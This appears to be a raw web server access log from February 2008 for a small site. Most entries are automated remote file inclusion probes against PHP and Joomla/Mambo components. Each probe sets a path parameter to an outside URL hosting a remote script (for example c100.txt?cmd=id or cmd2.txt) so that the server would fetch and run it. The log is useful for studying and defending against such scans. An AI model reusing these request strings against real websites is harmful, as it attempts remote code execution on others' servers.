62.112.140.125 - - [17/Feb/2008:17:20:57 -0800] "GET //agendax/addevent.inc.php?agendax_path=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [17/Feb/2008:17:20:58 -0800] "GET /errors.php?error=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [17/Feb/2008:17:20:58 -0800] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [17/Feb/2008:17:20:58 -0800] "GET /logs/errors.php?error=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
88.191.36.35 - - [17/Feb/2008:17:21:50 -0800] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://svchost.site.voila.fr/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
88.191.36.35 - - [17/Feb/2008:17:21:50 -0800] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://svchost.site.voila.fr/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
201.47.16.29 - - [17/Feb/2008:17:23:26 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://r57.li/c100.txt?cmd=id HTTP/1.1" 404 275 "-" "-" "www.galf.org"
82.165.176.137 - - [17/Feb/2008:17:24:26 -0800] "GET /logs/access_070917.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
82.165.176.137 - - [17/Feb/2008:17:24:26 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.cdpm3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.91.66.79 - - [17/Feb/2008:17:25:19 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
201.240.24.100 - - [17/Feb/2008:17:25:20 -0800] "GET / HTTP/1.1" 200 1048 "http://www.mhol.org.pe/comglbt.htm" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.galf.org"
201.240.24.100 - - [17/Feb/2008:17:25:23 -0800] "GET /cendoc/ HTTP/1.1" 200 526 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.galf.org"
201.240.24.100 - - [17/Feb/2008:17:25:24 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.galf.org"
201.240.24.100 - - [17/Feb/2008:17:25:30 -0800] "GET / HTTP/1.1" 200 1048 "http://www.galf.org/cendoc/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.galf.org"
201.240.24.100 - - [17/Feb/2008:17:25:59 -0800] "GET /logs/ HTTP/1.1" 200 6203 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.galf.org"
201.240.24.100 - - [17/Feb/2008:17:26:02 -0800] "GET /logs/access.log HTTP/1.1" 200 28339 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)" "www.galf.org"
68.52.242.139 - - [17/Feb/2008:17:27:19 -0800] "GET //admin/includes/admin_header.php?level=http://www.sattamax.net/gallery/include/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
200.105.239.8 - - [17/Feb/2008:17:29:42 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
208.226.79.133 - - [17/Feb/2008:17:30:06 -0800] "GET /logs/access_080114.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.226.79.133 - - [17/Feb/2008:17:30:06 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.226.79.133 - - [17/Feb/2008:17:30:06 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.226.79.133 - - [17/Feb/2008:17:30:19 -0800] "GET /logs/access_070917.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.226.79.133 - - [17/Feb/2008:17:30:41 -0800] "GET /logs/access_070917.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.226.79.133 - - [17/Feb/2008:17:30:41 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.226.79.133 - - [17/Feb/2008:17:30:42 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.226.79.133 - - [17/Feb/2008:17:30:46 -0800] "GET /logs/access_080114.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.89.224.76 - - [17/Feb/2008:17:31:05 -0800] "GET /logs/access_080211.log HTTP/1.0" 200 2655746 "-" "Wget/1.10.2" "galf.org"
207.58.184.150 - - [17/Feb/2008:17:32:39 -0800] "GET /logs/access_070917.log/index.php?x=http://www.alabamariders.net/eventcalendar/includes/data1/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.184.150 - - [17/Feb/2008:17:32:39 -0800] "GET /index.php?x=http://www.alabamariders.net/eventcalendar/includes/data1/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
207.58.184.150 - - [17/Feb/2008:17:32:42 -0800] "GET /logs/index.php?x=http://www.alabamariders.net/eventcalendar/includes/data1/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.56.111.194 - - [17/Feb/2008:17:34:49 -0800] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
195.56.111.194 - - [17/Feb/2008:17:34:49 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "galf.org"
85.119.157.77 - - [17/Feb/2008:17:37:49 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
85.119.157.77 - - [17/Feb/2008:17:37:49 -0800] "GET /errors.php?error=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
82.160.16.3 - - [17/Feb/2008:17:37:56 -0800] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
82.160.16.3 - - [17/Feb/2008:17:37:56 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
84.234.71.230 - - [17/Feb/2008:17:38:00 -0800] "GET //login.php?dir=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
68.52.242.139 - - [17/Feb/2008:17:41:32 -0800] "GET //admin/includes/admin_header.php?level=http://www.sattamax.net/gallery/include/cmds.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "galf.org"
89.111.176.86 - - [17/Feb/2008:17:44:55 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
81.91.66.79 - - [17/Feb/2008:17:46:14 -0800] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
81.91.66.79 - - [17/Feb/2008:17:46:14 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
87.230.11.181 - - [17/Feb/2008:17:48:05 -0800] "GET /logs/access.log/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
87.230.11.181 - - [17/Feb/2008:17:48:05 -0800] "GET /logs/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
210.245.164.10 - - [17/Feb/2008:17:49:20 -0800] "GET /logs/access_070917.log/index1.php?p=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.245.164.10 - - [17/Feb/2008:17:49:20 -0800] "GET /index1.php?p=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.245.164.10 - - [17/Feb/2008:17:49:21 -0800] "GET /logs/index1.php?p=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.112.124.79 - - [17/Feb/2008:17:50:57 -0800] "GET /logs/access_070917.log/includes/login.php?_SESSION[docroot_path]=http://www.saenterpriseworkshop.com/vnc/MIC22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
82.112.124.79 - - [17/Feb/2008:17:50:57 -0800] "GET /includes/login.php?_SESSION[docroot_path]=http://www.saenterpriseworkshop.com/vnc/MIC22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
82.112.124.79 - - [17/Feb/2008:17:50:58 -0800] "GET /logs/includes/login.php?_SESSION[docroot_path]=http://www.saenterpriseworkshop.com/vnc/MIC22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
210.245.164.10 - - [17/Feb/2008:17:51:08 -0800] "GET /logs/access_080114.log/index1.php?p=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
87.117.225.155 - - [17/Feb/2008:17:54:29 -0800] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.algebramovie.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
87.117.225.155 - - [17/Feb/2008:17:54:29 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.algebramovie.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.galf.org"
67.195.44.110 - - [17/Feb/2008:17:56:19 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
89.184.165.34 - - [17/Feb/2008:17:56:51 -0800] "GET /index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
67.195.44.85 - - [17/Feb/2008:17:57:24 -0800] "GET /logs/access_070806.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
62.112.140.125 - - [17/Feb/2008:17:57:25 -0800] "GET /logs/access_080114.log/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [17/Feb/2008:17:57:25 -0800] "GET /logs/access_080114.log/errors.php?error=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [17/Feb/2008:17:57:25 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [17/Feb/2008:17:57:26 -0800] "GET /errors.php?error=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [17/Feb/2008:17:57:26 -0800] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
62.112.140.125 - - [17/Feb/2008:17:57:26 -0800] "GET /logs/errors.php?error=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.galf.org"
66.98.144.78 - - [17/Feb/2008:17:59:07 -0800] "GET /logs//components/com_bsq_sitestats/external/rssfeed.phphttp://h1.ripway.com/capetacorpz/scan/portugues/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.98.144.78 - - [17/Feb/2008:17:59:08 -0800] "GET //components/com_bsq_sitestats/external/rssfeed.phphttp://h1.ripway.com/capetacorpz/scan/portugues/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
82.112.124.79 - - [17/Feb/2008:18:00:47 -0800] "GET /logs/access_080114.log/includes/login.php?_SESSION[docroot_path]=http://www.saenterpriseworkshop.com/vnc/MIC22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.98.144.78 - - [17/Feb/2008:18:01:03 -0800] "GET /logs//components/com_bsq_sitestats/external/rssfeed.phphttp://h1.ripway.com/1984/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
66.98.144.78 - - [17/Feb/2008:18:01:04 -0800] "GET //components/com_bsq_sitestats/external/rssfeed.phphttp://h1.ripway.com/1984/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.234.71.230 - - [17/Feb/2008:18:01:56 -0800] "GET /logs/access_080114.log//login.php?dir=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.234.71.230 - - [17/Feb/2008:18:01:56 -0800] "GET /logs//login.php?dir=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
205.234.242.100 - - [17/Feb/2008:18:02:18 -0800] "GET /logs/access_070917.log//skin/zero_vote/error.php?dir=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.242.100 - - [17/Feb/2008:18:02:18 -0800] "GET //skin/zero_vote/error.php?dir=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
205.234.242.100 - - [17/Feb/2008:18:02:19 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
200.105.239.8 - - [17/Feb/2008:18:02:53 -0800] "GET /logs/access.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
200.105.239.8 - - [17/Feb/2008:18:02:53 -0800] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=http://www.californiasecession.org/discuss/images/themes/obb108/.jst//figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
202.75.35.162 - - [17/Feb/2008:18:04:01 -0800] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.algebramovie.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.galf.org"
202.75.35.162 - - [17/Feb/2008:18:04:01 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.algebramovie.com/images/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.galf.org"
205.234.242.100 - - [17/Feb/2008:18:05:04 -0800] "GET /logs/access_080114.log//skin/zero_vote/error.php?dir=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.190.12 - - [17/Feb/2008:18:05:25 -0800] "GET /logs/access_070917.log/?cropimagedir=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.190.12 - - [17/Feb/2008:18:05:25 -0800] "GET /?cropimagedir=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.808" "www.galf.org"
67.15.190.12 - - [17/Feb/2008:18:05:25 -0800] "GET /logs/?cropimagedir=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 200 6203 "-" "libwww-perl/5.808" "www.galf.org"
82.134.6.30 - - [17/Feb/2008:18:07:53 -0800] "GET /logs/access_070917.log/?cropimagedir=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.134.6.30 - - [17/Feb/2008:18:07:53 -0800] "GET /?cropimagedir=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.803" "www.galf.org"
82.134.6.30 - - [17/Feb/2008:18:07:54 -0800] "GET /logs/?cropimagedir=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 200 6203 "-" "libwww-perl/5.803" "www.galf.org"
200.21.85.101 - - [17/Feb/2008:18:13:52 -0800] "GET /logs/access_070917.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.21.85.101 - - [17/Feb/2008:18:13:54 -0800] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
200.21.85.101 - - [17/Feb/2008:18:13:55 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.25.80 - - [17/Feb/2008:18:14:30 -0800] "GET /cendoc/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
84.234.71.230 - - [17/Feb/2008:18:14:59 -0800] "GET /logs/access_070917.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.234.71.230 - - [17/Feb/2008:18:14:59 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=ftp://80.50.253.90/upload/trop/oldbis?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
63.195.191.15 - - [17/Feb/2008:18:16:07 -0800] "GET /logs/access_070917.log//skin/zero_vote/error.php?dir=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
63.195.191.15 - - [17/Feb/2008:18:16:07 -0800] "GET //skin/zero_vote/error.php?dir=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
63.195.191.15 - - [17/Feb/2008:18:16:08 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.255.32.189 - - [17/Feb/2008:18:17:39 -0800] "GET /logs/access_070917.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.255.32.189 - - [17/Feb/2008:18:17:40 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
211.255.32.189 - - [17/Feb/2008:18:17:40 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
63.195.191.15 - - [17/Feb/2008:18:18:46 -0800] "GET /logs/access_080114.log//skin/zero_vote/error.php?dir=http://h1317070.stratoserver.net/cmd/scheck.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
69.64.76.29 - - [17/Feb/2008:18:19:09 -0800] "GET /logs/access.log/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
69.64.76.29 - - [17/Feb/2008:18:19:10 -0800] "GET /logs/index.php?option=com_jcs&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
203.157.182.9 - - [17/Feb/2008:18:19:23 -0800] "GET /logs/access_070917.log//skin/zero_vote/error.php?dir=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
203.157.182.9 - - [17/Feb/2008:18:19:25 -0800] "GET //skin/zero_vote/error.php?dir=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.13.222.135 - - [17/Feb/2008:18:19:30 -0800] "GET /logs/access_070917.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.13.222.135 - - [17/Feb/2008:18:19:31 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.13.222.135 - - [17/Feb/2008:18:19:31 -0800] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.157.182.9 - - [17/Feb/2008:18:19:35 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
67.15.190.12 - - [17/Feb/2008:18:20:05 -0800] "GET /logs/access_070917.log/?GALLERY_BASEDIR=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
67.15.190.12 - - [17/Feb/2008:18:20:05 -0800] "GET /?GALLERY_BASEDIR=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 200 1048 "-" "libwww-perl/5.808" "www.galf.org"
67.15.190.12 - - [17/Feb/2008:18:20:05 -0800] "GET /logs/?GALLERY_BASEDIR=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 200 6203 "-" "libwww-perl/5.808" "www.galf.org"
67.15.190.12 - - [17/Feb/2008:18:20:57 -0800] "GET /logs/access_080114.log/?GALLERY_BASEDIR=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.31.183.74 - - [17/Feb/2008:18:23:16 -0800] "GET /logs/access_070917.log//?mosConfig_absolute_path=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.31.183.74 - - [17/Feb/2008:18:23:16 -0800] "GET //?mosConfig_absolute_path=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 200 1048 "-" "libwww-perl/5.805" "www.galf.org"
209.31.183.74 - - [17/Feb/2008:18:23:17 -0800] "GET /logs//?mosConfig_absolute_path=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 200 6208 "-" "libwww-perl/5.805" "www.galf.org"
210.245.164.10 - - [17/Feb/2008:18:24:59 -0800] "GET /logs/access_070917.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.245.164.10 - - [17/Feb/2008:18:24:59 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
210.245.164.10 - - [17/Feb/2008:18:25:00 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://proxysx.t35.com/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.234.108.168 - - [17/Feb/2008:18:25:12 -0800] "GET /administrator/components/com_performs/lib/lib_template.php?mosConfig_absolute_path=http://www.smagz.com/jim.do??? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.galf.org"
